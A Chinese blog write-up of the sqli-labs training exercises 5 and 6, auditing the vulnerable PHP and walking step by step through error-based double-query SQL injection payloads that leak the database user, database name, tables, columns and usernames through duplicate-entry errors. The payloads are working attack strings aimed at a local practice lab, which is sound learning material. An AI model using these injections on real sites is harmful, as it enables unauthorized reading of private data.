第五题:

  • http://127.0.0.1/sqli/Less-5/?id=1 显示:You are in…….后面发现,不管是1,2,3,4都死显示Your are in ……,不打紧,继续看看
  • http://127.0.0.1/sqli/Less-5/?id=3' 直接报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘'3'' LIMIT 0,1’ at line 1,字符型注入,和第一题一样:
  • 判断回显点:http://127.0.0.1/sqli/Less-5/?id=3 order by 3 --+,… select 1,2,3 好奇怪,是 You are in …
  • 根据题目提示,这个是双查询注入,我参考了博客:https://www.cnblogs.com/-zhong/p/10892439.html但是作者只讲了方法,我觉得还是需要从源代码进行入手,即代码审计
  • 这道题运用的仍然是报错注入的方法,先进行一下代码审计,源代码是这样的:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

	if($row)

	{

  	echo '<font size="5" color="#FFFF00">';

  	echo 'You are in...........';

  	echo "<br>";

    	echo "</font>";

  	}

	else

	{

	echo '<font size="3" color="#FFFF00">';

	print_r(mysql_error());

	echo "</br></font>";

	echo '<font color= "#0000ff" font size= 3>';	

	}

}

	else { echo "Please input the ID as parameter with numeric value";}
  • 可以看到,主要还是有个mysql_fetch_array($result)这个代码,只要这个代码返回了值,就永远都是You are in…。所以此次注入的重点就是:不让mysql_fetch_array($result)起作用
  • 该博客的博主详细介绍了使用count()函数可以阻止结果的生成并且报错,报错的结果里面可以筛查出我们想要的信息,我的解释如下:
  • select concat((select database()),'sss');可以将数据库的名字和某个字符串相结合。
  • select rand();可以生成0~1的随机浮点数
  • select floor(rand()*2); 和floor()函数结合就可以生成随机整数。
  • select concat((select database()),floor(rand()*2)) from users; 加入限制条件就可以得到我们想要的数据库名称,而且可以把记录的行数生成出来。
  • select count(*),concat((select user()),floor(rand()*2)) as a from information_schema.schemata group by a;到最后,使用group by 进行分组,并且用count(*)进行计数,如果只有一组,那就无法分组导致报错,报错就会把内容爆出来,当然,这是随机的,要多试几次。
  • 回到题目:输入http://127.0.0.1/sqli/Less-5/?id=3' union select count(*),group_concat(database(),floor(rand()*2)) as a from information_schema.schemata group by a 就直接报错了:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘' LIMIT 0,1’ at line 1。这就是一个字符型注入,前面说了,就不验证了。
  • 使用:http://127.0.0.1/sqli/Less-5/?id=3' union select count(*),concat((select user()),floor(rand()*2)) as a from information_schema.schemata group by a --++++ 发现他说The used SELECT statements have a different number of columns。
  • 那就加上一行,在conut(*)前面加个1.
  • http://127.0.0.1/sqli/Less-5/?id=3' union select 1,count(*),concat((select user()),floor(rand()*2)) as a from information_schema.schemata group by a --++++ 多刷新几次,因为是随机数,查到users是root,于是我们就可以随意更改变量,来达到我们的目的。
  • 爆数据库名:http://127.0.0.1/sqli/Less-5/?id=3' union select 1,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.schemata group by a --++++报错是:Duplicate entry ‘security1’ for key ‘’ 可知数据库是security。
  • 爆表名:http://127.0.0.1/sqli/Less-5/?id=3' union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand()*2)) as a from information_schema.schemata group by a --++++报错:Duplicate entry ‘emails,referers,uagents,users0’ for key ‘’
  • 爆字段:http://127.0.0.1/sqli/Less-5/?id=3' union select 1,count(*),concat((select group_concat(column_name) from information_schema.columns where table_schema=database()),floor(rand()*2)) as a from information_schema.schemata group by a --++++报错Duplicate entry ‘id,email_id,id,referer,ip_address,id,uagent,ip_address,username,’ for key ‘’
  • 爆内容:http://127.0.0.1/sqli/Less-5/?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --++++++ 在limit后面变成2,1 3,1这么慢慢试就可以把元素都试出来了。

第六题:

  • 第五题和第六题差不多,我就以截图的形式来说吧:








SQL注入:sqli-labs:5~6 double injection(Query)的更多相关文章

  1. 【漏洞复现】CVE-2022–21661 WordPress核心框架WP_Query SQL注入漏洞原理分析与复现

    影响版本 wordpress < 5.8.3 分析 参考:https://blog.csdn.net/qq_46717339/article/details/122431779 在 5.8.3 ...

  2. SQL Injection(SQL注入漏洞)

    审计前准备: 1.安�php程序(推荐phpStudy) 2.高亮编辑器(推荐 Sublimetext Notepad++) 3.新建一个文本,复制以下变量,这些变量是审计中需要在源码中寻找的 ### ...

  3. WebGoat学习——SQL注入(SQL Injection)

    SQL注入(SQL Injection) 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令.攻击者通过web请求提交带有影响正 ...

  4. [SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

    FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION 这里先介绍一下POSTGRESQL.这是一款数据库管理系统,与oracle是同类型软件.08年左右的市场 ...

  5. [SQL注入1]From SQL injection to Shell

    第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...

  6. DVWA 黑客攻防演练(八)SQL 注入 SQL Injection

    web 程序中离不开数据库,但到今天 SQL注入是一种常见的攻击手段.如今现在一些 orm 框架(Hibernate)或者一些 mapper 框架( iBatis)会对 SQL 有一个更友好的封装,使 ...

  7. SQL注入——SQL Injection

    本文部分内容转自:https://www.cnblogs.com/rush/archive/2011/12/31/2309203.html http://www.diybl.com/course/7_ ...

  8. SQL注入(SQL Injection)案例和防御方案

    sql注入(SQL Injection):就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. SQL注入攻击的主要危害包括:非法读取.篡 ...

  9. 防sql注入之参数绑定 SQL Injection Attacks and Defense

    http://php.net/manual/zh/pdo.prepared-statements.php 预处理语句与存储过程 很多更成熟的数据库都支持预处理语句的概念.什么是预处理语句?可以把它看作 ...

  10. 【DVWA】【SQL Injection】SQL注入 Low Medium High Impossible

    1.初级篇 low.php 先看源码,取得的参数直接放到sql语句中执行 if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQ ...

随机推荐

  1. 其他:压力测试Jmeter工具使用

    下载路径: http://yd01.siweidaoxiang.com:8070/jmeter_52z.com.zip 配置汉化中文: 找到jmeter的安装目录:打开 \bin\jmeter.pro ...

  2. HTTP:Java实现HTTP请求的三种方式

    目前JAVA实现HTTP请求的方法用的最多的有两种: 一种是通过HTTPClient这种第三方的开源框架去实现.HTTPClient对HTTP的封装性比较不错,通过它基本上能够满足我们大部分的需求,H ...

  3. 资源:HTML调色板

    调色板路径 https://encycolorpedia.cn/

  4. kafka 安装和配置

    转载自:https://www.cnblogs.com/heijinli/p/13545182.html 下载及安装  第一步:进入kafka官网  按照自己的需求选择版本,我这里选择 最新版的 2. ...

  5. XCTF simple js

    思路分析: 进入靶场, 随便输入,肯定是错误的,f12看下源码,结合题目说js,把js代码单独拿出来看看. function dechiffre(pass_enc){ var pass = " ...

  6. wireshark 调试 https/http2和grpc流量

    本文浏览器以 Chrom 为例 平常需要抓包的场景比较少,记录一下防止下次忘记配置 1. 解析 TLS 在本地创建用于保存 ssl logfile 的文件(文件可以存放到任意位置), 并添加到环境变量 ...

  7. 「AGC027D」Modulo Matrix

    「AGC027D」Modulo Matrix 传送门 神仙构造题. 首先考虑一个非常自然的思路,我们把棋盘黑白染色后会变成一个二分图,黑色棋子只会与白色棋子相邻. 也就是说,我们可以将二分图的一部随便 ...

  8. 高校表白App-团队冲刺第二天

    今天要做什么 今天要把昨天的activity进行完善,并且加上计时跳转的功能,将其设置为主页面,设置两种跳转功能. 遇到的问题 今天没遇到什么大的问题,只是在进行编写的时候,又出现了R文件无法找到的情 ...

  9. CF1025B题解

    其他的几篇题解大多都是先求了 \(c_i \gets lcm(a_i,b_i)\) ,然后求全部 \(c_i\) 的最大公约数,但是对每一组数都求一下 \(lcm(a_i,b_i)\) 会增加时间复杂 ...

  10. ACM金牌选手讲解LeetCode算法《栈和队列的高级应用》

    大家好,我是编程熊,双非逆袭选手,字节跳动.旷视科技前员工,ACM金牌,保研985,<ACM金牌选手讲解LeetCode算法系列>作者. 上一篇文章讲解了<线性表>中的数组.链 ...